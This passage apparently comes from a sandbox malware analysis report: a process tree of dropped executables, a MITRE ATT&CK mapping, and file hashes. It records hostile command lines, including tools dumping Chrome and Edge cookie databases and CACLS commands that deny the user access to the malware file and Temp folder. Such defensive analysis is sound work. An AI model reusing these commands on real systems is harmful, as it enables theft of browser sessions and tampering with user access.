                                                                        • Adds Run key to start application
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:2140
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          PID:2136
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          PID:4600
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                      4⤵
                                                                        PID:2064
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                        4⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:648
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_2.exe
                                                                          sonia_2.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Checks SCSI registry key(s)
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious behavior: MapViewOfSection
                                                                          PID:2828
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                                        4⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:2820
                                                                • \??\c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                  1⤵
                                                                  • Suspicious use of SetThreadContext
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:1440
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                    2⤵
                                                                    • Drops file in System32 directory
                                                                    • Checks processor information in registry
                                                                    • Modifies data under HKEY_USERS
                                                                    • Modifies registry class
                                                                    PID:936
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_1.exe
                                                                  sonia_1.exe
                                                                  1⤵
                                                                    PID:3328
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_1.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_1.exe" -a
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      PID:2272
                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                    1⤵
                                                                    • Process spawned unexpected child process
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:2516
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                      2⤵
                                                                      • Loads dropped DLL
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:2244
                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                    1⤵
                                                                    • Process spawned unexpected child process
                                                                    PID:4080
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                      2⤵
                                                                      • Loads dropped DLL
                                                                      PID:4908
                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                    1⤵
                                                                    • Process spawned unexpected child process
                                                                    PID:1540
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                      2⤵
                                                                      • Loads dropped DLL
                                                                      PID:4144
                                                                  • C:\Windows\explorer.exe
                                                                    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                    1⤵
                                                                      PID:5324
                                                                    • C:\Users\Admin\AppData\Local\Temp\C3DD.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\C3DD.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      • Adds Run key to start application
                                                                      PID:5952
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /c echo Y|CACLS "C:\Users\Admin\AppData\Local\Temp\C3DD.exe" /P "Admin:N"
                                                                        2⤵
                                                                          PID:7028
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                            3⤵
                                                                              PID:6160
                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                              CACLS "C:\Users\Admin\AppData\Local\Temp\C3DD.exe" /P "Admin:N"
                                                                              3⤵
                                                                                PID:2836
                                                                            • C:\Windows\SysWOW64\CACLS.exe
                                                                              CACLS "C:\Users\Admin\AppData\Local\Temp\C3DD.exe" /P "Admin:R" /E
                                                                              2⤵
                                                                                PID:5156
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /c echo Y|CACLS "C:\Users\Admin\AppData\Local\Temp" /P "Admin:N"
                                                                                2⤵
                                                                                  PID:6480
                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                    CACLS "C:\Users\Admin\AppData\Local\Temp" /P "Admin:N"
                                                                                    3⤵
                                                                                      PID:6576
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                      3⤵
                                                                                        PID:6560
                                                                                    • C:\Windows\SysWOW64\CACLS.exe
                                                                                      CACLS "C:\Users\Admin\AppData\Local\Temp" /P "Admin:R" /E
                                                                                      2⤵
                                                                                        PID:6852
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5952 -s 696
                                                                                        2⤵
                                                                                        • Program crash
                                                                                        PID:5516
                                                                                    • C:\Users\Admin\AppData\Local\Temp\CDA2.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\CDA2.exe
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4568
                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5700
                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        2⤵
                                                                                          PID:6276
                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          2⤵
                                                                                            PID:6984
                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5416
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                          1⤵
                                                                                          • Drops file in Windows directory
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:4524
                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                          1⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          PID:5392
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:5808
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Modifies registry class
                                                                                          PID:2532
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                            PID:6676
                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                            1⤵
                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                            PID:7164
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                            1⤵
                                                                                            • Modifies registry class
                                                                                            PID:4464
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                            1⤵
                                                                                            • Modifies registry class
                                                                                            PID:6572

                                                                                          Network

                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                          Persistence

                                                                                          Modify Existing Service

                                                                                          1
                                                                                          T1031

                                                                                          Registry Run Keys / Startup Folder

                                                                                          1
                                                                                          T1060

                                                                                          Defense Evasion

                                                                                          Modify Registry

                                                                                          4
                                                                                          T1112

                                                                                          Disabling Security Tools

                                                                                          1
                                                                                          T1089

                                                                                          Virtualization/Sandbox Evasion

                                                                                          1
                                                                                          T1497

                                                                                          Install Root Certificate

                                                                                          1
                                                                                          T1130

                                                                                          Credential Access

                                                                                          Credentials in Files

                                                                                          4
                                                                                          T1081

                                                                                          Discovery

                                                                                          Query Registry

                                                                                          6
                                                                                          T1012

                                                                                          Virtualization/Sandbox Evasion

                                                                                          1
                                                                                          T1497

                                                                                          System Information Discovery

                                                                                          6
                                                                                          T1082

                                                                                          Peripheral Device Discovery

                                                                                          1
                                                                                          T1120

                                                                                          Remote System Discovery

                                                                                          1
                                                                                          T1018

                                                                                          Collection

                                                                                          Data from Local System

                                                                                          4
                                                                                          T1005

                                                                                          Command and Control

                                                                                          Web Service

                                                                                          1
                                                                                          T1102

                                                                                          Replay Monitor

                                                                                          Loading Replay Monitor...

                                                                                          Downloads

                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                            MD5

                                                                                            f7dcb24540769805e5bb30d193944dce

                                                                                            SHA1

                                                                                            e26c583c562293356794937d9e2e6155d15449ee

                                                                                            SHA256

                                                                                            6b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea

                                                                                            SHA512

                                                                                            cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94

                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                            MD5

                                                                                            003a8507913ba8de9c9fd28a5680472b

                                                                                            SHA1

                                                                                            d49c3d250c2f313329282758e1fc4010ac05ebac

                                                                                            SHA256

                                                                                            4793ea065bd04c000102887df71f8c5c6301f1a1cd2168108f3043d61086ce0b

                                                                                            SHA512

                                                                                            a5bab052b85693ef59c920664b1481dd730719b4d37be2ccdfccafd3dea4a02630c13b588772bb487502c29c58376c0b86fc7021719d6faf475075eb995894a4

                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\libcurl.dll
                                                                                            MD5

                                                                                            d09be1f47fd6b827c81a4812b4f7296f

                                                                                            SHA1

                                                                                            028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                            SHA256

                                                                                            0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                            SHA512

                                                                                            857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\libcurlpp.dll
                                                                                            MD5

                                                                                            e6e578373c2e416289a8da55f1dc5e8e

                                                                                            SHA1

                                                                                            b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                            SHA256

                                                                                            43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                            SHA512

                                                                                            9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\libgcc_s_dw2-1.dll
                                                                                            MD5

                                                                                            9aec524b616618b0d3d00b27b6f51da1

                                                                                            SHA1

                                                                                            64264300801a353db324d11738ffed876550e1d3

                                                                                            SHA256

                                                                                            59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                            SHA512

                                                                                            0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\libstdc++-6.dll
                                                                                            MD5

                                                                                            5e279950775baae5fea04d2cc4526bcc

                                                                                            SHA1

                                                                                            8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                            SHA256

                                                                                            97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                            SHA512

                                                                                            666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\libwinpthread-1.dll
                                                                                            MD5

                                                                                            1e0d62c34ff2e649ebc5c372065732ee

                                                                                            SHA1

                                                                                            fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                            SHA256

                                                                                            509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                            SHA512

                                                                                            3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\setup_install.exe
                                                                                            MD5

                                                                                            a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                            SHA1

                                                                                            e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                            SHA256

                                                                                            0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                            SHA512

                                                                                            c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\setup_install.exe
                                                                                            MD5

                                                                                            a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                            SHA1

                                                                                            e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                            SHA256

                                                                                            0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                            SHA512

                                                                                            c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_1.exe
                                                                                            MD5

                                                                                            6e43430011784cff369ea5a5ae4b000f

                                                                                            SHA1

                                                                                            5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                            SHA256

                                                                                            a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                            SHA512

                                                                                            33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_1.exe
                                                                                            MD5

                                                                                            6e43430011784cff369ea5a5ae4b000f

                                                                                            SHA1

                                                                                            5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                            SHA256

                                                                                            a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                            SHA512

                                                                                            33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_1.txt
                                                                                            MD5

                                                                                            6e43430011784cff369ea5a5ae4b000f

                                                                                            SHA1

                                                                                            5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                            SHA256

                                                                                            a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                            SHA512

                                                                                            33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_2.exe
                                                                                            MD5

                                                                                            18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                            SHA1

                                                                                            f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                            SHA256

                                                                                            365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                            SHA512

                                                                                            db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_2.txt
                                                                                            MD5

                                                                                            18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                            SHA1

                                                                                            f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                            SHA256

                                                                                            365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                            SHA512

                                                                                            db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_3.exe
                                                                                            MD5

                                                                                            ee658be7ea7269085f4004d68960e547

                                                                                            SHA1

                                                                                            979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                            SHA256

                                                                                            d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                            SHA512

                                                                                            fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_3.txt
                                                                                            MD5

                                                                                            ee658be7ea7269085f4004d68960e547

                                                                                            SHA1

                                                                                            979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                            SHA256

                                                                                            d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                            SHA512

                                                                                            fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_4.exe
                                                                                            MD5

                                                                                            6765fe4e4be8c4daf3763706a58f42d0

                                                                                            SHA1

                                                                                            cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                            SHA256

                                                                                            755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                            SHA512

                                                                                            c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_4.txt
                                                                                            MD5

                                                                                            6765fe4e4be8c4daf3763706a58f42d0

                                                                                            SHA1

                                                                                            cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                            SHA256

                                                                                            755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                            SHA512

                                                                                            c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_5.exe
                                                                                            MD5

                                                                                            0c3f670f496ffcf516fe77d2a161a6ee

                                                                                            SHA1

                                                                                            0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                            SHA256

                                                                                            8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                            SHA512

                                                                                            bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_5.txt
                                                                                            MD5

                                                                                            0c3f670f496ffcf516fe77d2a161a6ee

                                                                                            SHA1

                                                                                            0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                            SHA256

                                                                                            8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                            SHA512

                                                                                            bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_6.exe
                                                                                            MD5

                                                                                            2eb68e495e4eb18c86a443b2754bbab2

                                                                                            SHA1

                                                                                            82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                            SHA256

                                                                                            a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                            SHA512

                                                                                            f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_6.txt
                                                                                            MD5

                                                                                            2eb68e495e4eb18c86a443b2754bbab2

                                                                                            SHA1

                                                                                            82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                            SHA256

                                                                                            a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                            SHA512

                                                                                            f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                          • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                                                                            MD5

                                                                                            ba5a8020b3022821fd9510a50be8d004

                                                                                            SHA1

                                                                                            1700f22d6db1c3d8db9c10856dd96b3a86bac4bd

                                                                                            SHA256

                                                                                            7200d50443abb0f9bd8a7ef553d1cfcfd359ae1cf999cf82f285a2720affa306

                                                                                            SHA512

                                                                                            a4e70b5c8d48ca4b7d310af3ce12a3079f6ddfdd95913d6eb6e702d07ba3120d6b90c188a2fee477b0a8f1fe72cae62834ec69940b3a00eb89f90fa4c7fe7cb0

                                                                                          • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                                                                            MD5

                                                                                            ba5a8020b3022821fd9510a50be8d004

                                                                                            SHA1

                                                                                            1700f22d6db1c3d8db9c10856dd96b3a86bac4bd

                                                                                            SHA256

                                                                                            7200d50443abb0f9bd8a7ef553d1cfcfd359ae1cf999cf82f285a2720affa306

                                                                                            SHA512

                                                                                            a4e70b5c8d48ca4b7d310af3ce12a3079f6ddfdd95913d6eb6e702d07ba3120d6b90c188a2fee477b0a8f1fe72cae62834ec69940b3a00eb89f90fa4c7fe7cb0

                                                                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                            MD5

                                                                                            56bd0f698f28e63479e5697dd167926e

                                                                                            SHA1

                                                                                            a65ab942eb3b3ac45ecf24cf1a35d2734f14d666

                                                                                            SHA256

                                                                                            6a481c56aa97b2a75a3de488ce1a9a670c62fc364a432e8e68497f55fabb439d

                                                                                            SHA512

                                                                                            f8900374349e22a2eb2c4ae2598bb1ed5b0dd3ca2857e2fb10d2ed3474fea49a810eb92eb3a81e861bd47c54698fa934fe086bca7da6a1f164c34753b6d391f2

                                                                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                            MD5

                                                                                            56bd0f698f28e63479e5697dd167926e

                                                                                            SHA1

                                                                                            a65ab942eb3b3ac45ecf24cf1a35d2734f14d666

                                                                                            SHA256

                                                                                            6a481c56aa97b2a75a3de488ce1a9a670c62fc364a432e8e68497f55fabb439d

                                                                                            SHA512

                                                                                            f8900374349e22a2eb2c4ae2598bb1ed5b0dd3ca2857e2fb10d2ed3474fea49a810eb92eb3a81e861bd47c54698fa934fe086bca7da6a1f164c34753b6d391f2

                                                                                          • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                                            MD5

                                                                                            8ddd5b9dbcd4e37135868db27b675c2d

                                                                                            SHA1

                                                                                            9122af279871de3f92ac3728e2343950f3e8b995

                                                                                            SHA256

                                                                                            2f480cbf73a6166257f6d35d7fb2d9f776e257540144a5c8e780385b4773a03f

                                                                                            SHA512

                                                                                            e712688ffe6d30aa1b21cba4fa88a6d1c4f72ba3b7d672ee2e790a6a42bc40df02761ced6a5cebcd5bc5ac6c5a2cdad7b04f427e3f02fb225132214b3e68664f

                                                                                          • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                                            MD5

                                                                                            8ddd5b9dbcd4e37135868db27b675c2d

                                                                                            SHA1

                                                                                            9122af279871de3f92ac3728e2343950f3e8b995

                                                                                            SHA256

                                                                                            2f480cbf73a6166257f6d35d7fb2d9f776e257540144a5c8e780385b4773a03f

                                                                                            SHA512

                                                                                            e712688ffe6d30aa1b21cba4fa88a6d1c4f72ba3b7d672ee2e790a6a42bc40df02761ced6a5cebcd5bc5ac6c5a2cdad7b04f427e3f02fb225132214b3e68664f

                                                                                          • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                                            MD5

                                                                                            99ab358c6f267b09d7a596548654a6ba

                                                                                            SHA1

                                                                                            d5a643074b69be2281a168983e3f6bef7322f676

                                                                                            SHA256

                                                                                            586339f93c9c0eed8a42829ab307f2c5381a636edbcf80df3770c27555034380

                                                                                            SHA512

                                                                                            952040785a3c1dcaea613d2e0d46745d5b631785d26de018fd9f85f8485161d056bf67b19c96ae618d35de5d5991a0dd549d749949faea7a2e0f9991a1aa2b2b

                                                                                          • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                            MD5

                                                                                            1c7be730bdc4833afb7117d48c3fd513

                                                                                            SHA1

                                                                                            dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                            SHA256

                                                                                            8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                            SHA512

